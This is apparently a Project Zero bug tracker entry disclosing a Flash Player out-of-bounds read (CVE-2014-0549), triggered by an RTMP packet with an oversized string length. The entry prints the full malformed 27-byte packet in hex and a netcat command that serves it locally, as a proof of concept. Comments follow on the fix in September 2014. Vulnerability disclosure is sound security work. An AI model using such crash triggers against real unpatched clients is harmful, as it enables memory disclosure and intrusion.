79 - Flash out-of-bounds read with large string length in RTMP packet - project-zero

Starred by 3 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Sep 2014
Cc:	project-...@google.com
Severity-Medium Id-2933 CVE-2014-0549 Reported-2014-Jul-28 CCProjectZeroMembers Finder-cevans Product-Flash Vendor-Adobe Fixed-2014-Sep-9

Flash out-of-bounds read with large string length in RTMP packet

Reported by cevans@google.com, Jul 28 2014

Back to list

A SWF to reproduce is attached, along with the source. The SWF simply attempts a connection to rtmp://localhost/

The "bad" RTMP packet is attached. To replay it, use something like this (Linux command line) on the localhost machine:

nc -l 1935 < badstringread.rtmp

The packet is pretty small so here it is in its entirety:

01 03 00 00 00 00 00 0E 14 00 00 00 00 01 00 0C 7F FF FF FE 41 42 43 44 45 46 47

badstringread.rtmp
27 bytes Download

RTMPLocal.as
2.0 KB Download

RTMPLocal.swf
1.2 KB Download

Comment 1 by cevans@google.com, Jul 28 2014

Labels: Id-2933

Comment 2 by cevans@google.com, Sep 5 2014

Labels: CVE-2014-0549

Comment 3 by cevans@google.com, Sep 9 2014

Labels: Fixed-2014-Sep-9
Status: Fixed

http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.

Comment 4 by cevans@google.com, Sep 23 2014

Labels: -Restrict-View-Commit

Making public.

► Sign in to add a comment